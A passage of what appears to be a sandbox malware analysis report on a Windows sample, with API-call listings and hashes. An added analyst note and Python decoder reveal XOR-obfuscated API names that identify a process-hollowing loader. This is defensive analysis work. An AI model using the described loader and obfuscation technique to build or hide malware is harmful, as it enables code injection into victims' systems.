                                                                   • Edges: 302->303, 302->304, 304->305, 304->306, 305->303, 305->306, 306->307, 307->308, 307->309, 308->303, 308->311, 309->308, 309->310, 310->307, 311->312, 311->313, 312->313, 313->303, 313->314, 314->303, 314->315, 315->303, 315->316, 316->303
                                                                  APIs
                                                                  • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 006048D3
                                                                  • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 006048E0
                                                                  • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 006048E6
                                                                  • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 00604911
                                                                  • lstrcpynA.KERNEL32(?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00604966
                                                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00604976
                                                                  • lstrcpynA.KERNEL32(?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 006049A2
                                                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 006049B2
                                                                  • lstrcpynA.KERNEL32(?,?,00000105,?,00000000,00000002,?,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 006049DC
                                                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,00000105,?,00000000,00000002,?,?,00000105,?,00000000,00000003,?), ref: 006049EC
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.371099227.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                   • Associated: 00000002.00000002.371096001.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000002.00000002.371102376.000000000060A000.00000008.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000002.00000002.371105267.000000000060C000.00000008.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000002.00000002.371108196.000000000060F000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_600000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                                                  • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                  • API String ID: 1599918012-2375825460
                                                                  • Opcode ID: fbee07662e67e25edda719bac5f00b0db6dba760934fe37d0afadedae1740f6a
                                                                  • Instruction ID: 2ea8edce084a28266abf1f81c2071a4b319a879fe6d4c62b47c76c420ca39287
                                                                  • Opcode Fuzzy Hash: fbee07662e67e25edda719bac5f00b0db6dba760934fe37d0afadedae1740f6a
                                                                  • Instruction Fuzzy Hash: E13197B1E8424D7EDB69DAE8CC85FDFB7BE9B19300F0041A5A244E61C1DBB89E458B50

                                                                   Control-flow Graph (basic blocks keyed by the report's node IDs; edges listed last)
                                                                   • 317: 40399b-4039a6
                                                                   • 318: 4039a8-4039b7 LoadLibraryA
                                                                   • 319: 4039ea-4039f1
                                                                   • 322: 403a20-403a22
                                                                   • 323: 4039b9-4039ce GetProcAddress
                                                                   • 320: 4039f3-4039f9
                                                                   • 321: 403a09-403a15
                                                                   • 327: 4039fb-403a02
                                                                   • 324: 403a1c-403a1f
                                                                   • 325: 4039d0-4039e5 GetProcAddress * 2
                                                                   • 328: 403a04-403a07
                                                                   • Edges: 317->318, 317->319, 318->322, 318->323, 319->320, 319->321, 320->321, 320->327, 321->324, 322->324, 323->322, 323->325, 325->319, 327->321, 327->328, 328->321
                                                                  APIs
                                                                  • LoadLibraryA.KERNEL32(user32.dll), ref: 004039AD
                                                                  • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 004039C5
                                                                  • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 004039D6
                                                                  • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 004039E3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.370993339.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000002.00000002.370990312.0000000000400000.00000004.00000400.00020000.00000000.sdmp
                                                                   • Associated: 00000002.00000002.370996454.0000000000407000.00000004.00000400.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$LibraryLoad
                                                                  • String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
                                                                  • API String ID: 2238633743-4044615076
                                                                  • Opcode ID: 56fcd12e22422f3926956bab43dc5e187367ba90ba411f881e403aaca0228d71
                                                                  • Instruction ID: a479ffe80b3d4e596aad1b70f613aa0b77e146be3452bb55d1156979b56034e0
                                                                  • Opcode Fuzzy Hash: 56fcd12e22422f3926956bab43dc5e187367ba90ba411f881e403aaca0228d71
                                                                  • Instruction Fuzzy Hash: E20175317003029BC710EFF56D80D1B7EECD649792315443FA542F22A1D6B8C811AF6D

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • LoadLibraryA.KERNEL32(00000000), ref: 00609061
                                                                  • LoadLibraryA.KERNEL32(00000000), ref: 00609089
                                                                    • Part of subcall function 00608D40: lstrcmpA.KERNEL32(?,?), ref: 00608D95
                                                                    • Part of subcall function 00604F9C: CreateWindowExA.USER32 ref: 00604FD9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.371099227.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                   • Associated: 00000002.00000002.371096001.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000002.00000002.371102376.000000000060A000.00000008.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000002.00000002.371105267.000000000060C000.00000008.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000002.00000002.371108196.000000000060F000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_600000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: LibraryLoad$CreateWindowlstrcmp
                                                                  • String ID: @qfbwfSql`fppB$D$DfwWkqfbg@lmwf{w$Hfqmfo01$MWGOO$MZ$PE$PfwWkqfbg@lmwf{w$QfbgSql`fppNfnlqz$QfpvnfWkqfbg$TqjwfSql`fppNfnlqz$UjqwvboBool`F{$UjqwvboSqlwf`wF{$first Window app$oloooool
                                                                  • API String ID: 2125446073-2128899875
                                                                  • Opcode ID: d87c723a2cb561c1242fafc6be16d314feaded0c2aac151016e52f6c516e272c
                                                                  • Instruction ID: 715b9aa7201df64e9751e330e1e9c19a6bf475734f272f1f24890eb41cefc1f1
                                                                  • Opcode Fuzzy Hash: d87c723a2cb561c1242fafc6be16d314feaded0c2aac151016e52f6c516e272c
                                                                  • Instruction Fuzzy Hash: 2BC10B71A402189FDB54EBA8CC85BDFB7BAEF48300F5040A9F649E72C1DA749E458F64
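                                                                   Analyst note on the String ID above: the entries are Win32 API names obfuscated with a single-byte XOR. XOR-ing each character with 0x03 yields CreateProcessA, GetThreadContext, SetThreadContext, ReadProcessMemory, WriteProcessMemory, VirtualAllocEx, VirtualProtectEx, ResumeThread, Kernel32 and NTDLL, which is the API set of a RunPE / process-hollowing loader and matches the injection signatures listed at the top of this report. "MZ" and "PE" stay in the clear. The Python below is an added analysis example, not part of the Joe Sandbox output or of the sample: it copies the strings from the entry above, recovers the key by brute force against a reference list of hollowing APIs (the list is the analyst's assumption, not something the report provides) and prints the decoded names.

```python
"""Decode the XOR-obfuscated Win32 API names listed under "Strings" for the
function at 0x609061 (LoadLibraryA / CreateWindowExA) of this report.

Added analysis example; not part of the Joe Sandbox output. The key is not
read from the sample but recovered by brute force against a reference list
of process-hollowing APIs, so the same code works for other single-byte keys.
"""

import re

# The "String ID" entry for the function at 0x609061, copied from this report.
# Joe Sandbox joins the individual strings with '$'.
REPORT_STRINGS = (
    "@qfbwfSql`fppB$D$DfwWkqfbg@lmwf{w$Hfqmfo01$MWGOO$MZ$PE$PfwWkqfbg@lmwf{w"
    "$QfbgSql`fppNfnlqz$QfpvnfWkqfbg$TqjwfSql`fppNfnlqz$UjqwvboBool`F{"
    "$UjqwvboSqlwf`wF{$first Window app$oloooool"
).split("$")

# Analyst reference set (an assumption, not something the report lists): the
# API names a RunPE / process-hollowing loader needs.
HOLLOWING_APIS = frozenset({
    "CreateProcessA", "CreateProcessW", "GetThreadContext", "SetThreadContext",
    "ReadProcessMemory", "WriteProcessMemory", "VirtualAllocEx",
    "VirtualProtectEx", "ResumeThread", "NtUnmapViewOfSection",
})

# Identifier-like plaintext: letters/digits only, at least three characters.
IDENTIFIER = re.compile(r"^[A-Za-z][A-Za-z0-9]{2,}$")


def xor_decode(s: str, key: int) -> str:
    """Apply a single-byte XOR to every character (the scheme is symmetric)."""
    return "".join(chr(ord(c) ^ key) for c in s)


def recover_key(strings, known=HOLLOWING_APIS) -> int:
    """Try all 256 single-byte keys and return the one that turns the most
    entries into known API names. Key 0 is tried as well, so an unobfuscated
    list is reported as key 0 instead of being forced through a bogus key."""
    best_key, best_hits = 0, -1
    for key in range(256):
        hits = sum(1 for s in strings if xor_decode(s, key) in known)
        if hits > best_hits:
            best_key, best_hits = key, hits
    return best_key


def decode_strings(strings=REPORT_STRINGS):
    """Return (key, decoded) where decoded maps each entry whose plaintext is
    identifier-like onto that plaintext. Short literals such as "MZ" and "PE"
    (which look like the DOS/PE header magic kept in the clear) and the
    "first Window app" text do not survive decoding and are left out."""
    key = recover_key(strings)
    decoded = {}
    for s in strings:
        plain = xor_decode(s, key)
        if IDENTIFIER.match(plain):
            decoded[s] = plain
    return key, decoded


def hollowing_indicators(strings=REPORT_STRINGS):
    """Sorted list of decoded names that belong to the hollowing API set."""
    _, decoded = decode_strings(strings)
    return sorted(name for name in decoded.values() if name in HOLLOWING_APIS)


if __name__ == "__main__":
    key, decoded = decode_strings()
    print(f"key = 0x{key:02x}")
    for enc, plain in decoded.items():
        print(f"{enc!r:24} -> {plain}")
    print("hollowing APIs:", ", ".join(hollowing_indicators()))
```

Because XOR is a bijection per key, no other key can map the same entry onto a known API name, so the scoring is unambiguous here; on a sample that uses a rolling or multi-byte key the brute force would simply report few hits and the decoded list would stay mostly empty, which is the signal to look at the decoding routine itself rather than trust the string output.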
                                                                  APIs
                                                                  • LCMapStringW.KERNEL32(00000000,00000100,00405414,00000001,00000000,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?,00000000), ref: 00403B70
                                                                  • LCMapStringA.KERNEL32(00000000,00000100,00405410,00000001,00000000,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?,00000000), ref: 00403B8C
                                                                  • LCMapStringA.KERNEL32(?,00000100,00000020,00000001,00000000,00000100,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?,00000000), ref: 00403BD5
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000101,00000020,00000001,00000000,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?,00000000), ref: 00403C0D
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,00000020,00000001,00000100,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?), ref: 00403C65
                                                                  • LCMapStringW.KERNEL32(?,00000100,00000100,00000000,00000000,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?), ref: 00403C7B
                                                                  • LCMapStringW.KERNEL32(?,00000100,00000100,00000000,00000000,00000100,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?), ref: 00403CAE
                                                                  • LCMapStringW.KERNEL32(?,00000100,00000100,00000100,?,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?), ref: 00403D16
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.370993339.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000002.00000002.370990312.0000000000400000.00000004.00000400.00020000.00000000.sdmp
                                                                   • Associated: 00000002.00000002.370996454.0000000000407000.00000004.00000400.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: String$ByteCharMultiWide
                                                                  • String ID:
                                                                  • API String ID: 352835431-0
APIs
• GetThreadLocale.KERNEL32(00000000,006081AF,?,?,00000000,00000000), ref: 00607F1A
  • Part of subcall function 00606ADC: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00606AFA
Strings
Memory Dump Source
• Source File: 00000002.00000002.371099227.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
• Associated: 00000002.00000002.371096001.0000000000600000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.371102376.000000000060A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.371105267.000000000060C000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.371108196.000000000060F000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_600000_25F.jbxd
Similarity
• API ID: Locale$InfoThread
• String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
• API String ID: 4232894706-2493093252
APIs
• LoadLibraryA.KERNEL32(00000000), ref: 00609674
Strings
Memory Dump Source
• Source File: 00000002.00000002.371099227.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
• Associated: 00000002.00000002.371096001.0000000000600000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.371102376.000000000060A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.371105267.000000000060C000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.371108196.000000000060F000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_600000_25F.jbxd
Similarity
• API ID: LibraryLoad
• String ID: EjmgQfplvq`fB$EqffQfplvq`f$Hfqmfo01$Ol`hQfplvq`f$OlbgQfplvq`f$PjyfleQfplvq`f
• API String ID: 1029625771-1297955608
APIs
• GetModuleFileNameA.KERNEL32(00000000,?,00000104,?), ref: 0040257E
• GetStdHandle.KERNEL32(000000F4,00405348,00000000,?,00000000,?), ref: 00402654
• WriteFile.KERNEL32(00000000), ref: 0040265B
Strings
Memory Dump Source
• Source File: 00000002.00000002.370993339.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.370990312.0000000000400000.00000004.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.370996454.0000000000407000.00000004.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_25F.jbxd
Similarity
• API ID: File$HandleModuleNameWrite
• String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
• API String ID: 3784150691-4022980321
APIs
• GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00603932,?,?,?,?,00000002,006039DE,0060292B,00602973,00000000), ref: 006038A1
• WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?), ref: 006038A7
• GetStdHandle.KERNEL32(000000F5,006038F0,00000002,?,00000000,00000000,?,00603932,?,?,?,?,00000002,006039DE,0060292B,00602973), ref: 006038BC
• WriteFile.KERNEL32(00000000,000000F5,006038F0,00000002,?), ref: 006038C2
• MessageBoxA.USER32 ref: 006038E0
Strings
Memory Dump Source
• Source File: 00000002.00000002.371099227.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
• Associated: 00000002.00000002.371096001.0000000000600000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.371102376.000000000060A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.371105267.000000000060C000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.371108196.000000000060F000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_600000_25F.jbxd
Similarity
• API ID: FileHandleWrite$Message
• String ID: Error$Runtime error at 00000000
• API String ID: 1570097196-2970929446
APIs
• GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,0040185C), ref: 00401F28
• GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,0040185C), ref: 00401F3C
• GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,0040185C), ref: 00401F68
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,0040185C), ref: 00401FA0
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,0040185C), ref: 00401FC2
• FreeEnvironmentStringsW.KERNEL32(00000000,?,00000000,?,?,?,?,0040185C), ref: 00401FDB
• GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,0040185C), ref: 00401FEE
• FreeEnvironmentStringsA.KERNEL32(00000000), ref: 0040202C
Memory Dump Source
• Source File: 00000002.00000002.370993339.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.370990312.0000000000400000.00000004.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.370996454.0000000000407000.00000004.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_25F.jbxd
Similarity
• API ID: EnvironmentStrings$ByteCharFreeMultiWide
• String ID:
• API String ID: 1823725401-0
APIs
• VirtualQuery.KERNEL32(?,?,0000001C), ref: 00607064
• GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 00607088
• GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 006070A3
• LoadStringA.USER32 ref: 00607147
Strings
Memory Dump Source
• Source File: 00000002.00000002.371099227.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
• Associated: 00000002.00000002.371096001.0000000000600000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.371102376.000000000060A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.371105267.000000000060C000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.371108196.000000000060F000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_600000_25F.jbxd
Similarity
• API ID: FileModuleName$LoadQueryStringVirtual
• String ID: 8S`$P`
• API String ID: 3990497365-1792595465
APIs
• VirtualQuery.KERNEL32(?,?,0000001C), ref: 00607064
• GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 00607088
• GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 006070A3
• LoadStringA.USER32 ref: 00607147
Strings
Memory Dump Source
• Source File: 00000002.00000002.371099227.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
• Associated: 00000002.00000002.371096001.0000000000600000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.371102376.000000000060A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.371105267.000000000060C000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.371108196.000000000060F000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_600000_25F.jbxd
Similarity
• API ID: FileModuleName$LoadQueryStringVirtual
• String ID: 8S`$P`
• API String ID: 3990497365-1792595465
APIs
  • Part of subcall function 00607048: VirtualQuery.KERNEL32(?,?,0000001C), ref: 00607064
  • Part of subcall function 00607048: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 00607088
  • Part of subcall function 00607048: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 006070A3
  • Part of subcall function 00607048: LoadStringA.USER32 ref: 00607147
• CharToOemA.USER32 ref: 00607217
• GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 00607234
• WriteFile.KERNEL32(00000000,000000F4,?,00000000,?), ref: 0060723A
• GetStdHandle.KERNEL32(000000F4,006072A4,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0060724F
• WriteFile.KERNEL32(00000000,000000F4,006072A4,00000002,?), ref: 00607255
• LoadStringA.USER32 ref: 00607277
• MessageBoxA.USER32 ref: 0060728D
Memory Dump Source
• Source File: 00000002.00000002.371099227.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
• Associated: 00000002.00000002.371096001.0000000000600000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.371102376.000000000060A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.371105267.000000000060C000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.371108196.000000000060F000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_600000_25F.jbxd
Similarity
• API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
• String ID:
• API String ID: 185507032-0
APIs
• GetStringTypeW.KERNEL32(00000001,00405414,00000001,00000000,?,00000100,00000000,00402A37,00000001,00000020,00000100,?,00000000), ref: 00403DBC
• GetStringTypeA.KERNEL32(00000000,00000001,00405410,00000001,00000000,?,00000100,00000000,00402A37,00000001,00000020,00000100,?,00000000), ref: 00403DD6
• GetStringTypeA.KERNEL32(00000000,?,00000100,00000020,00000001,?,00000100,00000000,00402A37,00000001,00000020,00000100,?,00000000), ref: 00403E0A
• MultiByteToWideChar.KERNEL32(00402A37,00000101,00000100,00000020,00000000,00000000,?,00000100,00000000,00402A37,00000001,00000020,00000100,?,00000000), ref: 00403E42
• MultiByteToWideChar.KERNEL32(00402A37,00000001,00000100,00000020,?,00000100,?,00000100,00000000,00402A37,00000001,00000020,00000100,?), ref: 00403E98
• GetStringTypeW.KERNEL32(?,?,00000000,00000001,?,00000100,?,00000100,00000000,00402A37,00000001,00000020,00000100,?), ref: 00403EAA
Memory Dump Source
• Source File: 00000002.00000002.370993339.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.370990312.0000000000400000.00000004.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.370996454.0000000000407000.00000004.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_25F.jbxd
Similarity
• API ID: StringType$ByteCharMultiWide
• String ID:
• API String ID: 3852931651-0
APIs
• EnterCriticalSection.KERNEL32(0060B5C4,00000000,00601B9C), ref: 00601AD7
• LocalFree.KERNEL32(?,00000000,00601B9C), ref: 00601AE9
• VirtualFree.KERNEL32(?,00000000,00008000,?,00000000,00601B9C), ref: 00601B0D
• LocalFree.KERNEL32(00000000,?,00000000,00008000,?,00000000,00601B9C), ref: 00601B5E
• LeaveCriticalSection.KERNEL32(0060B5C4,00601BA3,?,00000000,00601B9C), ref: 00601B8C
• DeleteCriticalSection.KERNEL32(0060B5C4,00601BA3,?,00000000,00601B9C), ref: 00601B96
Memory Dump Source
• Source File: 00000002.00000002.371099227.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
• Associated: 00000002.00000002.371096001.0000000000600000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.371102376.000000000060A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.371105267.000000000060C000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.371108196.000000000060F000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_600000_25F.jbxd
Similarity
• API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
• String ID:
• API String ID: 3782394904-0
APIs
  • Part of subcall function 00602ED4: GetKeyboardType.USER32 ref: 00602ED9
  • Part of subcall function 00602ED4: GetKeyboardType.USER32 ref: 00602EE5
• GetCommandLineA.KERNEL32 ref: 00604CF7
• GetVersion.KERNEL32 ref: 00604D0B
• GetVersion.KERNEL32 ref: 00604D1C
• GetCurrentThreadId.KERNEL32 ref: 00604D58
  • Part of subcall function 00602F04: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00602F26
  • Part of subcall function 00602F04: RegQueryValueExA.ADVAPI32 ref: 00602F59
  • Part of subcall function 00602F04: RegCloseKey.ADVAPI32(?), ref: 00602F6F
• GetThreadLocale.KERNEL32 ref: 00604D38
  • Part of subcall function 00604BC8: GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,00604C2E), ref: 00604BEE
Memory Dump Source
• Source File: 00000002.00000002.371099227.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
• Associated: 00000002.00000002.371096001.0000000000600000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.371102376.000000000060A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.371105267.000000000060C000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.371108196.000000000060F000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_600000_25F.jbxd
Similarity
• API ID: KeyboardLocaleThreadTypeVersion$CloseCommandCurrentInfoLineOpenQueryValue
• String ID:
• API String ID: 3734044017-0
                                                                  • Opcode ID: 5427cc31308d50f8f58cb81c4086aa616b8e4a906fae4bce7af71f1dfe7d5ce2
                                                                  • Instruction ID: feb53608f4c1b4819b7fdf81e77006572a780a3a92dd732f2b90cdc25788172e
                                                                  • Opcode Fuzzy Hash: 5427cc31308d50f8f58cb81c4086aa616b8e4a906fae4bce7af71f1dfe7d5ce2
                                                                  • Instruction Fuzzy Hash: 600125F44C4341C5E76DBF60AC8674B3A639F13344F14B85DE2514A3E2EF754184976A
                                                                  APIs
                                                                  • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00602F26
                                                                  • RegQueryValueExA.ADVAPI32 ref: 00602F59
                                                                  • RegCloseKey.ADVAPI32(?), ref: 00602F6F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.371099227.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                  • Associated: 00000002.00000002.371096001.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000002.00000002.371102376.000000000060A000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000002.00000002.371105267.000000000060C000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000002.00000002.371108196.000000000060F000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_600000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: CloseOpenQueryValue
                                                                  • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                  • API String ID: 3677997916-4173385793
                                                                  • Opcode ID: c522d6b20feab569b95bd321231a7b39662f5e31493b4586a0d9637fe5901882
                                                                  • Instruction ID: c03fda469428753ecf02ecefcce68b4b7182e76c56f88a0b924b5aea7086ba02
                                                                  • Opcode Fuzzy Hash: c522d6b20feab569b95bd321231a7b39662f5e31493b4586a0d9637fe5901882
                                                                  • Instruction Fuzzy Hash: 3601B5755C030AB9DB15DBE0CC56BFB77BDDB09744F5000A5BA04D65C0E6705A14D798
                                                                  APIs
                                                                  • GetStartupInfoA.KERNEL32 ref: 0040209D
                                                                  • GetFileType.KERNEL32 ref: 00402148
                                                                  • GetStdHandle.KERNEL32(-000000F6,?,00000000), ref: 004021AB
                                                                  • GetFileType.KERNEL32 ref: 004021B9
                                                                  • SetHandleCount.KERNEL32 ref: 004021F0
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.370993339.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.370990312.0000000000400000.00000004.00000400.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.370996454.0000000000407000.00000004.00000400.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: FileHandleType$CountInfoStartup
                                                                  • String ID:
                                                                  • API String ID: 1710529072-0
                                                                  • Opcode ID: 400b9e1c09f4c8b4246377677c855733b0a7004988ecaecd724ee2ff353f4308
                                                                  • Instruction ID: caac54b683a96beeea0f3893d81dbd00cf7c5e2421639fb466baf6c3d4da63b4
